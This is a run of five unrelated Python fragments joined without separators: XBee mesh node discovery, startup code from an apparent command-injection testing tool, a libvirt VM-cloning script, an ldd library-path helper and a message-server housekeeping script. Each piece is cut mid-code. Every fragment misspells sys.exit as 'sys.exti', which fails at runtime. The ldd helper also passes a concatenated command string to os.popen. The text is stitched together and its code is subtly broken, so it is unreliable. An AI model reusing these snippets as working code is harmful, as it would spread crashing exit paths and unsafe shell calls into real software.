LONG_WAIT logging.debug('Sleeping %0.02f', pause) time.sleep(pause) except ValueError: logging.debug('Worker error') # función que realiza el procedimiento de descubrimiento de los nodos listado en el archivo list_of_nodes.ini nodos_activos = [] def descubre_nodos(): index_devices = 0 try: for index in range(0, len(REMOTE_NODES_ID)): nodo_descubierto = False intentos_descubir = 0 while (nodo_descubierto != True ) and intentos_descubir < MAX_INTENTOS_DESCUBRIMIENTO: remote_device = (xbee_network.discover_device( REMOTE_NODES_ID[index])) if remote_device is None: logging.debug('Could not find the remote device: %s', REMOTE_NODES_ID[index]) intentos_descubir += 1 logging.debug("Nodo: %s", (REMOTE_NODES_ID[index])) logging.debug( 'Intentos descubrimiento restantes: %s', (MAX_INTENTOS_DESCUBRIMIENTO - intentos_descubir)) time.sleep(1) else: nodos_activos.append(remote_device) index_devices += 1 logging.debug('Descubierto: %s', remote_device) nodo_descubierto = True except: logging.debug('Error proceso descubrimiento') # Configuracíon de la salida del log logging.basicConfig( level=logging.DEBUG, format='(%(threadName)-10s) %(message)s', ) # Conexión al nodo local local_device = XBeeDevice(port, baud_rate) xbee_network = local_device.get_network() local_device.open() local_device.set_sync_ops_timeout(40) descubre_nodos() try: lectura = ReadAD() # Creación de un hilo por cada nodo activo for i in range(len(nodos_activos)): logging.debug('creando hilo') t = threading.Thread(name=nodos_activos[i], target=worker, args=( lectura, i, )) t.start() if len(nodos_activos) == 0: logging.debug('No nodes found') sys.exti(-1) else: logging.debug('Waiting for worker threads') main_thread = threading.main_thread() for t in threading.enumerate(): if t is not main_thread: t.join() logging.debug('Counter: %d', lectura.value) except: logging.debug('exept') sys.exit(1)
except SocketError and err_msg: if settings.VERBOSITY_LEVEL >= 1: print ("") err_msg = "The target host is not responding." err_msg += " Please ensure that is up and try again." print(("\n" + settings.print_critical_msg(err_msg) )) logs.print_logs_notification(filename, url) try: # Check python version number. version.python_version() # Check if defined "--version" option. if menu.options.version: version.show_version() raise sys.exti() # Print the legal disclaimer msg. print((settings.print_legal_disclaimer_msg(settings.LEGAL_DISCLAIMER_MSG))) if not menu.options.batch: settings.OS_CHECKS_NUM = 1 for os_checks_num in range(0, int(settings.OS_CHECKS_NUM)): # Check if defined "--list-tampers" option. if menu.options.list_tampers: checks.list_tamper_scripts() raise SystemExit() if readline_error : checks.no_readline_module()
def main(): parent_parser = libargparse.parse_argv() parent_parser.set_defaults(config_file=default_configfile()) args = parse_argv(parent_parser) (config_file, guest_name, log_level, sudo, dst_lv_size, os_variant) = (args.config_file, args.guest_name, args.log_level, args.sudo, args.lv_size, args.os_variant) scriptname = os.path.basename(__file__) # objects log_fmt = '%(asctime)s [%(levelname)s] %(name)s: %(message)s' log = liblogging.setup_logging(name=scriptname, filename='-', log_level=log_level, fmt=log_fmt) clone = libvirtclone.VirtClone(sudo=sudo) try: configparser = libconfigparser3.Parser(config_file) hv = configparser.get_nmdict('hypervisor') guest = configparser.get_nmdict(os_variant) src_guest_name = guest['name'] src_guest_disk_path = guest['disk_path'] src_guest_disk_size = None src_guest_disk_type = guest['disk_type'] src_guest_partition = guest['partition'] src_guest_lgvol = guest['lg_vol'] sysprep_execute = guest['sysprep_execute'] sysprep_enable = guest['sysprep_enable'] sysprep_script = guest.get('sysprep_script', None) dst_lv_name = clone.guest_disk_name(guest_name) dst_vg_name = hv['vg_name'] # il guest di origine deve essere spento if clone.guest_is_alive(src_guest_name) is True: log.error('{} {}'.format(src_guest_name, 'must be shut off!')) sys.exit(1) if src_guest_disk_type == 'lvm': get_size = clone.lv_size elif src_guest_disk_type == 'qemu': get_size = clone.qemu_disk_size else: log.error('disk_type must to be `lvm` or `qemu`') sys.exit(1) # dimensione del Logical Volume di destinazione if dst_lv_size is not None: dst_guest_disk_size = dst_lv_size else: src_guest_disk_size = get_size(src_guest_disk_path) dst_guest_disk_size = src_guest_disk_size # creazione del Logical Volume lv_create_stdout = clone.lv_create(dst_guest_disk_size, dst_vg_name, dst_lv_name) log.info(lv_create_stdout.strip()) # full PATH del Logical Volume di destinazione dst_guest_disk = os.path.join('/dev', dst_vg_name, dst_lv_name) # variabili con dimensioni del disco di origine e destinazione if src_guest_disk_size is None: src_guest_disk_size = get_size(src_guest_disk_path) dst_guest_disk_size = get_size(dst_guest_disk) resize_method = clone.virt_resize_method( int(src_guest_disk_size[:-1]), int(dst_guest_disk_size[:-1])) write_xml_only = False if resize_method is None else True log.info('disk clone, please wait...') write_xml_only_str = '{}={}'.format('write_xml_only', write_xml_only) log.debug(_join(['virt-clone', src_guest_name, guest_name, dst_guest_disk, write_xml_only_str])) virt_clone_stdout = clone.virt_clone(src_guest_name, guest_name, dst_guest_disk, write_xml_only) log.debug(virt_clone_stdout) if write_xml_only is True or resize_method is not None: log.debug(_join(['virt-resize', src_guest_disk_path, dst_guest_disk, resize_method, src_guest_partition, src_guest_lgvol, 'lv_expand=False'])) resize_stdout = clone.virt_resize(src_guest_disk_path, dst_guest_disk, resize_method, src_guest_partition, src_guest_lgvol, lv_expand=False,) log.debug(resize_stdout.rstrip()) log.info('disk clone successfully') if sysprep_execute == 'True': log.info('starting sysprep') sysprep_out = clone.sysprep(sysprep_enable, guest_name, sysprep_script) log.debug(sysprep_out) log.info('sysprep successfully') log.info('clone successfully') except subprocess.CalledProcessError as e: log.error(fmt_called_processor_error(e)) sys.exit(e.returncode) except KeyboardInterrupt: sys.exti(1) except Exception as e: los = traceback.format_exception_only(type(e), e) log.error(_join(los)) sys.exit(1)
#use like: python + script_name + libname # coding = utf-8 import sys, os try: str_obrel = os.environ["OB_REL"] lib_name = sys.argv[1] str_order = "ldd " + lib_name res_obrel = "" try: f = os.popen(str_order) except: print("you need checke the order" + str_order + " whether it can do well in the linux") sys.exti(1) lines = f.readlines() temp = "" for line in lines: if str_obrel not in line: continue l_index = line.find('>') r_index = line.find('(') if l_index == -1 or r_index == -1: continue l_index = l_index + 1 line = line[l_index:r_index].strip() # print ('line:'+ line) if os.path.islink(line): temp = os.readlink(line) else: temp = line
if __name__ == '__main__': CONFIG_FNAME = '/var/natmsg/conf/housekeeping_shardsvr.conf' MAIN_CONFIG = configparser.ConfigParser() MAIN_CONFIG.read(CONFIG_FNAME) DBNAME = MAIN_CONFIG['global']['DBNAME'] HOSTNAME = MAIN_CONFIG['global']['HOSTNAME'] DB_UNAME = MAIN_CONFIG['global']['DB_UNAME'] DB_PW = MAIN_CONFIG['global']['DB_PW'] if DBNAME == '' or DB_UNAME == '' or DB_PW == '' or HOSTNAME == '': print('Error, database connection details are missing.') sys.exti(15) ############################################################################## datestamp = datetime.datetime.now() datestamp_sql = "'" + str(datestamp.year) + "-" \ + str(datestamp.month).zfill(2) \ + "-" + str(datestamp.day).zfill(2) + ' ' \ + str(datestamp.hour).zfill(2) \ + ':' + str(datestamp.minute).zfill(2) + ':' \ + str(datestamp.second).zfill(2) + "'::timestamp " ## print('datestamp: ' + datestamp_sql) ############################################################ # register the ssl keys and a few shards that # I create that should never be read out = {}